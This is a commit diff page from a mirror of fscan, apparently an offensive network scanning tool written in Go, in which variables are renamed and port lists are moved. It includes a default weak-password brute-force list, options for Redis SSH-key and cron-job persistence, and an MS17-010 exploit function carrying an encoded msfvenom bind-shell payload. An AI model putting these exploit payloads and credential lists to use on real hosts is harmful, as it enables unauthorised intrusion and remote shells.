admin/fscan
1
0
Fork 0
mirror of https://github.com/shadow1ng/fscan.git synced 2025-06-21 02:10:55 +00:00
Code Issues Packages Projects Releases Wiki Activity

refactor: 大型重构

Browse Source
This commit is contained in:
ZacharyZcR 2024-12-20 03:46:09 +08:00
parent c0b7f4ca4f
commit bdeabec67e
27 changed files with 227 additions and 232 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

128
Common/Config.go
View File

@ -15,33 +15,8 @@ var Userdict = map[string][]string{
var Passwords = []string{"123456", "admin", "admin123", "root", "", "pass123", "pass@123", "password", "123123", "654321", "111111", "123", "1", "admin@123", "Admin@123", "admin123!@#", "{user}", "{user}1", "{user}111", "{user}123", "{user}@123", "{user}_123", "{user}#123", "{user}@111", "{user}@2019", "{user}@123#4", "P@ssw0rd!", "P@ssw0rd", "Passw0rd", "qwe123", "12345678", "test", "test123", "123qwe", "123qwe!@#", "123456789", "123321", "666666", "a123456.", "123456~a", "123456!a", "000000", "1234567890", "8888888", "!QAZ2wsx", "1qaz2wsx", "abc123", "abc123456", "1qaz@WSX", "a11111", "a12345", "Aa1234", "Aa1234.", "Aa12345", "a123456", "a123123", "Aa123123", "Aa123456", "Aa12345.", "sysadmin", "system", "1qaz!QAZ", "2wsx@WSX", "qwe123!@#", "Aa123456!", "A123456s!", "sa123456", "1q2w3e", "Charge123", "Aa123456789"}
var PortGroup = map[string]string{
"ftp": "21",
"ssh": "22",
"findnet": "135",
"netbios": "139",
"smb": "445",
"mssql": "1433",
"oracle": "1521",
"mysql": "3306",
"rdp": "3389",
"psql": "5432",
"redis": "6379",
"fcgi": "9000",
"mem": "11211",
"mgo": "27017",
"ms17010": "445",
"cve20200796": "445",
"service": "21,22,135,139,445,1433,1521,3306,3389,5432,6379,9000,11211,27017",
"db": "1433,1521,3306,5432,6379,11211,27017",
"web": "80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880",
"all": "1-65535",
"main": "21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017",
}
var Outputfile = "result.txt"
var IsSave = true
var Webport = "80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880"
var DefaultPorts = "21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017"
type PocInfo struct {
Target string
@ -49,50 +24,69 @@ type PocInfo struct {
}
var (
Ports string
Path string
Scantype string
Command string
SshKey string
Domain string
Username string
Password string
Proxy string
Timeout int64 = 3
WebTimeout int64 = 5
TmpSave bool
NoPing bool
Ping bool
Pocinfo PocInfo
NoPoc bool
IsBrute bool
RedisFile string
RedisShell string
Userfile string
Passfile string
Hashfile string
HostFile string
PortFile string
PocPath string
Threads int
URL string
UrlFile string
Urls []string
NoPorts string
NoHosts string
SC string
PortAdd string
UserAdd string
PassAdd string
BruteThread int
// 目标配置
Ports string
ExcludePorts string // 原NoPorts
ExcludeHosts string
AddPorts string // 原PortAdd
// 认证配置
Username string
Password string
Domain string
SshKeyPath string // 原SshKey
AddUsers string // 原UserAdd
AddPasswords string // 原PassAdd
// 扫描配置
ScanMode string // 原Scantype
ThreadNum int // 原Threads
Timeout int64 = 3
LiveTop int
DisablePing bool // 原NoPing
UsePing bool // 原Ping
Command string
// 文件配置
HostsFile string // 原HostFile
UsersFile string // 原Userfile
PasswordsFile string // 原Passfile
HashFile string // 原Hashfile
PortsFile string // 原PortFile
// Web配置
TargetURL string // 原URL
URLsFile string // 原UrlFile
URLs []string // 原Urls
WebTimeout int64 = 5
HttpProxy string // 原Proxy
Socks5Proxy string
Hash string
Hashs []string
HashBytes [][]byte
HostPort []string
IsWmi bool
Noredistest bool
// POC配置
PocPath string
Pocinfo PocInfo
DisablePoc bool // 原NoPoc
// Redis配置
RedisFile string
RedisShell string
DisableRedis bool // 原Noredistest
// 爆破配置
DisableBrute bool // 原IsBrute
BruteThreads int // 原BruteThread
// 其他配置
RemotePath string // 原Path
HashValue string // 原Hash
HashValues []string // 原Hashs
HashBytes [][]byte
HostPort []string
Shellcode string // 原SC
EnableWmi bool // 原IsWmi
// 输出配置
DisableSave bool // 原TmpSave
)
var (

56
Common/Flag.go
View File

@ -21,47 +21,47 @@ func Flag(Info *HostInfo) {
// 目标配置
flag.StringVar(&Info.Host, "h", "", "目标主机IP例如: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12")
flag.StringVar(&NoHosts, "hn", "", "排除的主机范围,例如: -hn 192.168.1.1/24")
flag.StringVar(&Ports, "p", DefaultPorts, "端口配置,例如: 22 | 1-65535 | 22,80,3306")
flag.StringVar(&PortAdd, "pa", "", "在默认端口基础上添加端口,-pa 3389")
flag.StringVar(&NoPorts, "pn", "", "排除的端口,例如: -pn 445")
flag.StringVar(&ExcludeHosts, "eh", "", "排除的主机范围,例如: -eh 192.168.1.1/24")
flag.StringVar(&Ports, "p", MainPorts, "端口配置,例如: 22 | 1-65535 | 22,80,3306")
flag.StringVar(&AddPorts, "pa", "", "在默认端口基础上添加端口,-pa 3389")
flag.StringVar(&ExcludePorts, "pn", "", "排除的端口,例如: -pn 445")
// 认证配置
flag.StringVar(&UserAdd, "usera", "", "在默认用户列表基础上添加用户,-usera user")
flag.StringVar(&PassAdd, "pwda", "", "在默认密码列表基础上添加密码,-pwda password")
flag.StringVar(&AddUsers, "usera", "", "在默认用户列表基础上添加用户,-usera user")
flag.StringVar(&AddPasswords, "pwda", "", "在默认密码列表基础上添加密码,-pwda password")
flag.StringVar(&Username, "user", "", "用户名")
flag.StringVar(&Password, "pwd", "", "密码")
flag.StringVar(&Domain, "domain", "", "域名(用于SMB)")
flag.StringVar(&SshKey, "sshkey", "", "SSH密钥文件(id_rsa)")
flag.StringVar(&SshKeyPath, "sshkey", "", "SSH密钥文件(id_rsa)")
// 扫描配置
flag.StringVar(&Scantype, "m", "all", "扫描类型,例如: -m ssh")
flag.IntVar(&Threads, "t", 600, "线程数量")
flag.StringVar(&ScanMode, "m", "all", "扫描类型,例如: -m ssh")
flag.IntVar(&ThreadNum, "t", 600, "线程数量")
flag.Int64Var(&Timeout, "time", 3, "超时时间(秒)")
flag.IntVar(&LiveTop, "top", 10, "显示存活主机数量")
flag.BoolVar(&NoPing, "np", false, "禁用存活探测")
flag.BoolVar(&Ping, "ping", false, "使用ping替代ICMP")
flag.BoolVar(&DisablePing, "np", false, "禁用存活探测")
flag.BoolVar(&UsePing, "ping", false, "使用ping替代ICMP")
flag.StringVar(&Command, "c", "", "执行命令(支持ssh|wmiexec)")
// 文件配置
flag.StringVar(&HostFile, "hf", "", "主机列表文件")
flag.StringVar(&Userfile, "userf", "", "用户名字典")
flag.StringVar(&Passfile, "pwdf", "", "密码字典")
flag.StringVar(&Hashfile, "hashf", "", "Hash字典")
flag.StringVar(&PortFile, "portf", "", "端口列表文件")
flag.StringVar(&HostsFile, "hf", "", "主机列表文件")
flag.StringVar(&UsersFile, "userf", "", "用户名字典")
flag.StringVar(&PasswordsFile, "pwdf", "", "密码字典")
flag.StringVar(&HashFile, "hashf", "", "Hash字典")
flag.StringVar(&PortsFile, "portf", "", "端口列表文件")
// Web配置
flag.StringVar(&URL, "u", "", "目标URL")
flag.StringVar(&UrlFile, "uf", "", "URL列表文件")
flag.StringVar(&TargetURL, "u", "", "目标URL")
flag.StringVar(&URLsFile, "uf", "", "URL列表文件")
flag.StringVar(&Cookie, "cookie", "", "设置Cookie")
flag.Int64Var(&WebTimeout, "wt", 5, "Web请求超时时间")
flag.StringVar(&Proxy, "proxy", "", "设置HTTP代理")
flag.StringVar(&HttpProxy, "proxy", "", "设置HTTP代理")
flag.StringVar(&Socks5Proxy, "socks5", "", "设置Socks5代理(将用于TCP连接,超时设置将失效)")
// POC配置
flag.StringVar(&PocPath, "pocpath", "", "POC文件路径")
flag.StringVar(&Pocinfo.PocName, "pocname", "", "使用包含指定名称的POC,例如: -pocname weblogic")
flag.BoolVar(&NoPoc, "nopoc", false, "禁用Web漏洞扫描")
flag.BoolVar(&DisablePoc, "nopoc", false, "禁用Web漏洞扫描")
flag.BoolVar(&PocFull, "full", false, "完整POC扫描,如:shiro 100个key")
flag.BoolVar(&DnsLog, "dns", false, "启用dnslog验证")
flag.IntVar(&PocNum, "num", 20, "POC并发数")
@ -69,21 +69,21 @@ func Flag(Info *HostInfo) {
// Redis利用配置
flag.StringVar(&RedisFile, "rf", "", "Redis写入SSH公钥文件")
flag.StringVar(&RedisShell, "rs", "", "Redis写入计划任务")
flag.BoolVar(&Noredistest, "noredis", false, "禁用Redis安全检测")
flag.BoolVar(&DisableRedis, "noredis", false, "禁用Redis安全检测")
// 暴力破解配置
flag.BoolVar(&IsBrute, "nobr", false, "禁用密码爆破")
flag.IntVar(&BruteThread, "br", 1, "密码爆破线程数")
flag.BoolVar(&DisableBrute, "nobr", false, "禁用密码爆破")
flag.IntVar(&BruteThreads, "br", 1, "密码爆破线程数")
// 其他配置
flag.StringVar(&Path, "path", "", "FCG/SMB远程文件路径")
flag.StringVar(&Hash, "hash", "", "Hash值")
flag.StringVar(&SC, "sc", "", "MS17漏洞shellcode")
flag.BoolVar(&IsWmi, "wmi", false, "启用WMI")
flag.StringVar(&RemotePath, "path", "", "FCG/SMB远程文件路径")
flag.StringVar(&HashValue, "hash", "", "Hash值")
flag.StringVar(&Shellcode, "sc", "", "MS17漏洞shellcode")
flag.BoolVar(&EnableWmi, "wmi", false, "启用WMI")
// 输出配置
flag.StringVar(&Outputfile, "o", "result.txt", "结果输出文件")
flag.BoolVar(&TmpSave, "no", false, "禁用结果保存")
flag.BoolVar(&DisableSave, "no", false, "禁用结果保存")
flag.BoolVar(&Silent, "silent", false, "静默扫描模式")
flag.BoolVar(&Nocolor, "nocolor", false, "禁用彩色输出")
flag.BoolVar(&JsonOutput, "json", false, "JSON格式输出")

130
Common/Parse.go
View File

@ -21,7 +21,7 @@ func Parse(Info *HostInfo) {
// ParseUser 解析用户名配置,支持直接指定用户名列表或从文件读取
func ParseUser() error {
// 如果未指定用户名和用户名文件,直接返回
if Username == "" && Userfile == "" {
if Username == "" && UsersFile == "" {
return nil
}
@ -34,8 +34,8 @@ func ParseUser() error {
}
// 从文件加载用户名列表
if Userfile != "" {
users, err := Readfile(Userfile)
if UsersFile != "" {
users, err := Readfile(UsersFile)
if err != nil {
return fmt.Errorf("读取用户名文件失败: %v", err)
}
@ -77,8 +77,8 @@ func ParsePass(Info *HostInfo) error {
}
// 从文件加载密码列表
if Passfile != "" {
passes, err := Readfile(Passfile)
if PasswordsFile != "" {
passes, err := Readfile(PasswordsFile)
if err != nil {
return fmt.Errorf("读取密码文件失败: %v", err)
}
@ -92,8 +92,8 @@ func ParsePass(Info *HostInfo) error {
}
// 处理哈希文件
if Hashfile != "" {
hashes, err := Readfile(Hashfile)
if HashFile != "" {
hashes, err := Readfile(HashFile)
if err != nil {
return fmt.Errorf("读取哈希文件失败: %v", err)
}
@ -104,7 +104,7 @@ func ParsePass(Info *HostInfo) error {
continue
}
if len(line) == 32 {
Hashs = append(Hashs, line)
HashValues = append(HashValues, line)
validCount++
} else {
fmt.Printf("[!] 无效的哈希值(长度!=32): %s\n", line)
@ -114,23 +114,23 @@ func ParsePass(Info *HostInfo) error {
}
// 处理直接指定的URL列表
if URL != "" {
urls := strings.Split(URL, ",")
if TargetURL != "" {
urls := strings.Split(TargetURL, ",")
tmpUrls := make(map[string]struct{})
for _, url := range urls {
if url != "" {
if _, ok := tmpUrls[url]; !ok {
tmpUrls[url] = struct{}{}
Urls = append(Urls, url)
URLs = append(URLs, url)
}
}
}
fmt.Printf("[*] 已加载直接指定的URL: %d 个\n", len(Urls))
fmt.Printf("[*] 已加载直接指定的URL: %d 个\n", len(URLs))
}
// 从文件加载URL列表
if UrlFile != "" {
urls, err := Readfile(UrlFile)
if URLsFile != "" {
urls, err := Readfile(URLsFile)
if err != nil {
return fmt.Errorf("读取URL文件失败: %v", err)
}
@ -140,7 +140,7 @@ func ParsePass(Info *HostInfo) error {
if url != "" {
if _, ok := tmpUrls[url]; !ok {
tmpUrls[url] = struct{}{}
Urls = append(Urls, url)
URLs = append(URLs, url)
}
}
}
@ -148,8 +148,8 @@ func ParsePass(Info *HostInfo) error {
}
// 从文件加载端口列表
if PortFile != "" {
ports, err := Readfile(PortFile)
if PortsFile != "" {
ports, err := Readfile(PortsFile)
if err != nil {
return fmt.Errorf("读取端口文件失败: %v", err)
}
@ -205,53 +205,53 @@ func Readfile(filename string) ([]string, error) {
// ParseInput 解析和验证输入参数配置
func ParseInput(Info *HostInfo) error {
// 检查必要的目标参数
if Info.Host == "" && HostFile == "" && URL == "" && UrlFile == "" {
if Info.Host == "" && HostsFile == "" && TargetURL == "" && URLsFile == "" {
fmt.Println("[!] 未指定扫描目标")
flag.Usage()
return fmt.Errorf("必须指定扫描目标")
}
// 配置基本参数
if BruteThread <= 0 {
BruteThread = 1
fmt.Printf("[*] 已将暴力破解线程数设置为: %d\n", BruteThread)
if BruteThreads <= 0 {
BruteThreads = 1
fmt.Printf("[*] 已将暴力破解线程数设置为: %d\n", BruteThreads)
}
if TmpSave {
if DisableSave {
IsSave = false
fmt.Println("[*] 已启用临时保存模式")
}
// 处理端口配置
if Ports == DefaultPorts {
Ports += "," + Webport
if Ports == MainPorts {
Ports += "," + WebPorts
}
if PortAdd != "" {
if AddPorts != "" {
if strings.HasSuffix(Ports, ",") {
Ports += PortAdd
Ports += AddPorts
} else {
Ports += "," + PortAdd
Ports += "," + AddPorts
}
fmt.Printf("[*] 已添加额外端口: %s\n", PortAdd)
fmt.Printf("[*] 已添加额外端口: %s\n", AddPorts)
}
// 处理用户名配置
if UserAdd != "" {
users := strings.Split(UserAdd, ",")
if AddUsers != "" {
users := strings.Split(AddUsers, ",")
for dict := range Userdict {
Userdict[dict] = append(Userdict[dict], users...)
Userdict[dict] = RemoveDuplicate(Userdict[dict])
}
fmt.Printf("[*] 已添加额外用户名: %s\n", UserAdd)
fmt.Printf("[*] 已添加额外用户名: %s\n", AddUsers)
}
// 处理密码配置
if PassAdd != "" {
passes := strings.Split(PassAdd, ",")
if AddPasswords != "" {
passes := strings.Split(AddPasswords, ",")
Passwords = append(Passwords, passes...)
Passwords = RemoveDuplicate(Passwords)
fmt.Printf("[*] 已添加额外密码: %s\n", PassAdd)
fmt.Printf("[*] 已添加额外密码: %s\n", AddPasswords)
}
// 处理Socks5代理配置
@ -268,45 +268,45 @@ func ParseInput(Info *HostInfo) error {
if err != nil {
return fmt.Errorf("Socks5代理格式错误: %v", err)
}
NoPing = true
DisablePing = true
fmt.Printf("[*] 使用Socks5代理: %s\n", Socks5Proxy)
}
// 处理HTTP代理配置
if Proxy != "" {
switch Proxy {
if HttpProxy != "" {
switch HttpProxy {
case "1":
Proxy = "http://127.0.0.1:8080"
HttpProxy = "http://127.0.0.1:8080"
case "2":
Proxy = "socks5://127.0.0.1:1080"
HttpProxy = "socks5://127.0.0.1:1080"
default:
if !strings.Contains(Proxy, "://") {
Proxy = "http://127.0.0.1:" + Proxy
if !strings.Contains(HttpProxy, "://") {
HttpProxy = "http://127.0.0.1:" + HttpProxy
}
}
if !strings.HasPrefix(Proxy, "socks") && !strings.HasPrefix(Proxy, "http") {
if !strings.HasPrefix(HttpProxy, "socks") && !strings.HasPrefix(HttpProxy, "http") {
return fmt.Errorf("不支持的代理类型")
}
_, err := url.Parse(Proxy)
_, err := url.Parse(HttpProxy)
if err != nil {
return fmt.Errorf("代理格式错误: %v", err)
}
fmt.Printf("[*] 使用代理: %s\n", Proxy)
fmt.Printf("[*] 使用代理: %s\n", HttpProxy)
}
// 处理Hash配置
if Hash != "" {
if len(Hash) != 32 {
if HashValue != "" {
if len(HashValue) != 32 {
return fmt.Errorf("Hash长度必须为32位")
}
Hashs = append(Hashs, Hash)
HashValues = append(HashValues, HashValue)
}
// 处理Hash列表
Hashs = RemoveDuplicate(Hashs)
for _, hash := range Hashs {
HashValues = RemoveDuplicate(HashValues)
for _, hash := range HashValues {
hashByte, err := hex.DecodeString(hash)
if err != nil {
fmt.Printf("[!] Hash解码失败: %s\n", hash)
@ -314,7 +314,7 @@ func ParseInput(Info *HostInfo) error {
}
HashBytes = append(HashBytes, hashByte)
}
Hashs = []string{}
HashValues = []string{}
return nil
}
@ -323,34 +323,36 @@ func ParseInput(Info *HostInfo) error {
func ParseScantype(Info *HostInfo) error {
// 先处理特殊扫描类型
specialTypes := map[string]string{
"hostname": "135,137,139,445",
"webonly": Webport,
"webpoc": Webport,
"web": Webport,
"portscan": DefaultPorts + "," + Webport,
"main": DefaultPorts,
"all": DefaultPorts + "," + Webport,
"icmp": "", // ICMP不需要端口
"service": ServicePorts,
"db": DbPorts,
"web": WebPorts,
"all": AllPorts,
"main": MainPorts,
"port": MainPorts + "," + WebPorts,
"icmp": "", // ICMP不需要端口
}
// 如果是特殊扫描类型
if customPorts, isSpecial := specialTypes[Scantype]; isSpecial {
if Scantype != "all" && Ports == DefaultPorts+","+Webport {
if customPorts, isSpecial := specialTypes[ScanMode]; isSpecial {
// 专门处理 all 类型
if ScanMode == "all" {
Ports = AllPorts // 直接设置为 1-65535
} else if Ports == MainPorts+","+WebPorts {
Ports = customPorts
}
fmt.Printf("[*] 扫描类型: %s, 目标端口: %s\n", Scantype, Ports)
fmt.Printf("[*] 扫描类型: %s, 目标端口: %s\n", ScanMode, Ports)
return nil
}
// 检查是否是注册的插件类型
plugin, validType := PluginManager[Scantype]
plugin, validType := PluginManager[ScanMode]
if !validType {
showmode()
return fmt.Errorf("无效的扫描类型: %s", Scantype)
return fmt.Errorf("无效的扫描类型: %s", ScanMode)
}
// 如果是插件扫描且使用默认端口配置
if Ports == DefaultPorts+","+Webport {
if Ports == MainPorts+","+WebPorts {
if plugin.Port > 0 {
Ports = strconv.Itoa(plugin.Port)
}

12
Common/ParsePort.go
View File

@ -23,20 +23,12 @@ func ParsePort(ports string) []int {
continue
}
// 处理预定义端口组
if PortGroup[port] != "" {
groupPorts := ParsePort(PortGroup[port])
scanPorts = append(scanPorts, groupPorts...)
fmt.Printf("[*] 解析端口组 %s -> %v\n", port, groupPorts)
continue
}
// 处理端口范围
upper := port
if strings.Contains(port, "-") {
ranges := strings.Split(port, "-")
if len(ranges) < 2 {
fmt.Printf("[!] 无效的端口范围格式: %s\n", port)
fmt.Printf("[-] 无效的端口范围格式: %s\n", port)
continue
}
@ -57,7 +49,7 @@ func ParsePort(ports string) []int {
end, _ := strconv.Atoi(upper)
for i := start; i <= end; i++ {
if i > 65535 || i < 1 {
fmt.Printf("[!] 忽略无效端口: %d\n", i)
fmt.Printf("[-] 忽略无效端口: %d\n", i)
continue
}
scanPorts = append(scanPorts, i)

7
Common/Ports.go Normal file
View File

@ -0,0 +1,7 @@
package Common
var ServicePorts = "21,22,135,139,445,1433,1521,3306,3389,5432,6379,9000,11211,27017"
var DbPorts = "1433,1521,3306,5432,6379,11211,27017"
var WebPorts = "80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880"
var AllPorts = "1-65535"
var MainPorts = "21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017"

4
Core/PortScan.go
View File

@ -29,7 +29,7 @@ func PortScan(hostslist []string, ports string, timeout int64) []string {
probePorts = excludeNoPorts(probePorts)
// 创建通道
workers := Common.Threads
workers := Common.ThreadNum
addrs := make(chan Addr, 100)
results := make(chan string, 100)
var wg sync.WaitGroup
@ -110,7 +110,7 @@ func NoPortScan(hostslist []string, ports string) []string {
// excludeNoPorts 排除指定的端口
func excludeNoPorts(ports []int) []int {
noPorts := Common.ParsePort(Common.NoPorts)
noPorts := Common.ParsePort(Common.ExcludePorts)
if len(noPorts) == 0 {
return ports
}

22
Core/Scanner.go
View File

@ -13,8 +13,8 @@ func Scan(info Common.HostInfo) {
fmt.Println("[*] 开始信息扫描...")
// 本地信息收集模块
if Common.Scantype == "localinfo" {
ch := make(chan struct{}, Common.Threads)
if Common.ScanMode == "localinfo" {
ch := make(chan struct{}, Common.ThreadNum)
wg := sync.WaitGroup{}
AddScan("localinfo", info, &ch, &wg)
wg.Wait()
@ -25,7 +25,7 @@ func Scan(info Common.HostInfo) {
}
// 解析目标主机IP
Hosts, err := Common.ParseIP(info.Host, Common.HostFile, Common.NoHosts)
Hosts, err := Common.ParseIP(info.Host, Common.HostsFile, Common.ExcludeHosts)
if err != nil {
fmt.Printf("[!] 解析主机错误: %v\n", err)
return
@ -33,23 +33,23 @@ func Scan(info Common.HostInfo) {
// 初始化配置
lib.Inithttp()
ch := make(chan struct{}, Common.Threads)
ch := make(chan struct{}, Common.ThreadNum)
wg := sync.WaitGroup{}
var AlivePorts []string
if len(Hosts) > 0 || len(Common.HostPort) > 0 {
// ICMP存活性检测
if (Common.NoPing == false && len(Hosts) > 1) || Common.Scantype == "icmp" {
Hosts = CheckLive(Hosts, Common.Ping)
if (Common.DisablePing == false && len(Hosts) > 1) || Common.ScanMode == "icmp" {
Hosts = CheckLive(Hosts, Common.UsePing)
fmt.Printf("[+] ICMP存活主机数量: %d\n", len(Hosts))
if Common.Scantype == "icmp" {
if Common.ScanMode == "icmp" {
Common.LogWG.Wait()
return
}
}
// 端口扫描策略
AlivePorts = executeScanStrategy(Hosts, Common.Scantype)
AlivePorts = executeScanStrategy(Hosts, Common.ScanMode)
// 处理自定义端口
if len(Common.HostPort) > 0 {
@ -69,12 +69,12 @@ func Scan(info Common.HostInfo) {
}
info.Host, info.Ports = hostParts[0], hostParts[1]
executeScanTasks(info, Common.Scantype, &ch, &wg)
executeScanTasks(info, Common.ScanMode, &ch, &wg)
}
}
// URL扫描
for _, url := range Common.Urls {
for _, url := range Common.URLs {
info.Url = url
AddScan("web", info, &ch, &wg)
}
@ -115,7 +115,7 @@ func executeScanTasks(info Common.HostInfo, scanType string, ch *chan struct{},
switch info.Ports {
case "135":
AddScan("findnet", info, ch, wg)
if Common.IsWmi {
if Common.EnableWmi {
AddScan("wmiexec", info, ch, wg)
}
case "445":

2
Plugins/FTP.go
View File

@ -11,7 +11,7 @@ import (
// FtpScan 执行FTP服务扫描
func FtpScan(info *Common.HostInfo) (tmperr error) {
// 如果已开启暴力破解则直接返回
if Common.IsBrute {
if Common.DisableBrute {
return
}

6
Plugins/FcgiScan.go
View File

@ -21,14 +21,14 @@ import (
// FcgiScan 执行FastCGI服务器漏洞扫描
func FcgiScan(info *Common.HostInfo) error {
// 如果设置了暴力破解模式则跳过
if Common.IsBrute {
if Common.DisableBrute {
return nil
}
// 设置目标URL路径
url := "/etc/issue"
if Common.Path != "" {
url = Common.Path
if Common.RemotePath != "" {
url = Common.RemotePath
}
addr := fmt.Sprintf("%v:%v", info.Host, info.Ports)

10
Plugins/MS17010-Exp.go
View File

@ -19,7 +19,7 @@ func MS17010EXP(info *Common.HostInfo) {
var sc string
// 根据不同类型选择shellcode
switch Common.SC {
switch Common.Shellcode {
case "bind":
// msfvenom生成的Bind Shell, 监听64531端口
sc_enc := "gUYe7vm5/MQzTkSyKvpMFImS/YtwI+HxNUDd7MeUKDIxBZ8nsaUtdMEXIZmlZUfoQacylFEZpu7iWBRpQZw0KElIFkZR9rl4fpjyYNhEbf9JdquRrvw4hYMypBbfDQ6MN8csp1QF5rkMEs6HvtlKlGSaff34Msw6RlvEodROjGYA+mHUYvUTtfccymIqiU7hCFn+oaIk4ZtCS0Mzb1S5K5+U6vy3e5BEejJVA6u6I+EUb4AOSVVF8GpCNA91jWD1AuKcxg0qsMa+ohCWkWsOxh1zH0kwBPcWHAdHIs31g26NkF14Wl+DHStsW4DuNaxRbvP6awn+wD5aY/1QWlfwUeH/I+rkEPF18sTZa6Hr4mrDPT7eqh4UrcTicL/x4EgovNXA9X+mV6u1/4Zb5wy9rOVwJ+agXxfIqwL5r7R68BEPA/fLpx4LgvTwhvytO3w6I+7sZS7HekuKayBLNZ0T4XXeM8GpWA3h7zkHWjTm41/5JqWblQ45Msrg+XqD6WGvGDMnVZ7jE3xWIRBR7MrPAQ0Kl+Nd93/b+BEMwvuinXp1viSxEoZHIgJZDYR5DykQLpexasSpd8/WcuoQQtuTTYsJpHFfvqiwn0djgvQf3yk3Ro1EzjbR7a8UzwyaCqtKkCu9qGb+0m8JSpYS8DsjbkVST5Y7ZHtegXlX1d/FxgweavKGz3UiHjmbQ+FKkFF82Lkkg+9sO3LMxp2APvYz2rv8RM0ujcPmkN2wXE03sqcTfDdjCWjJ/evdrKBRzwPFhjOjUX1SBVsAcXzcvpJbAf3lcPPxOXM060OYdemu4Hou3oECjKP2h6W9GyPojMuykTkcoIqgN5Ldx6WpGhhE9wrfijOrrm7of9HmO568AsKRKBPfy/QpCfxTrY+rEwyzFmU1xZ2lkjt+FTnsMJY8YM7sIbWZauZ2S+Ux33RWDf7YUmSGlWC8djqDKammk3GgkSPHjf0Qgknukptxl977s2zw4jdh8bUuW5ap7T+Wd/S0ka90CVF4AyhonvAQoi0G1qj5gTih1FPTjBpf+FrmNJvNIAcx2oBoU4y48c8Sf4ABtpdyYewUh4NdxUoL7RSVouU1MZTnYS9BqOJWLMnvV7pwRmHgUz3fe7Kx5PGnP/0zQjW/P/vgmLMh/iBisJIGF3JDGoULsC3dabGE5L7sXuCNePiOEJmgwOHlFBlwqddNaE+ufor0q4AkQBI9XeqznUfdJg2M2LkUZOYrbCjQaE7Ytsr3WJSXkNbOORzqKo5wIf81z1TCow8QuwlfwIanWs+e8oTavmObV3gLPoaWqAIUzJqwD9O4P6x1176D0Xj83n6G4GrJgHpgMuB0qdlK"
@ -56,15 +56,15 @@ func MS17010EXP(info *Common.HostInfo) {
default:
// 从文件读取或直接使用提供的shellcode
if strings.Contains(Common.SC, "file:") {
read, err := ioutil.ReadFile(Common.SC[5:])
if strings.Contains(Common.Shellcode, "file:") {
read, err := ioutil.ReadFile(Common.Shellcode[5:])
if err != nil {
Common.LogError(fmt.Sprintf("[-] MS17010读取Shellcode文件 %v 失败: %v", Common.SC, err))
Common.LogError(fmt.Sprintf("[-] MS17010读取Shellcode文件 %v 失败: %v", Common.Shellcode, err))
return
}
sc = fmt.Sprintf("%x", read)
} else {
sc = Common.SC
sc = Common.Shellcode
}
}

4
Plugins/MS17010.go
View File

@ -84,7 +84,7 @@ func init() {
// MS17010 扫描入口函数
func MS17010(info *Common.HostInfo) error {
// 暴力破解模式下跳过扫描
if Common.IsBrute {
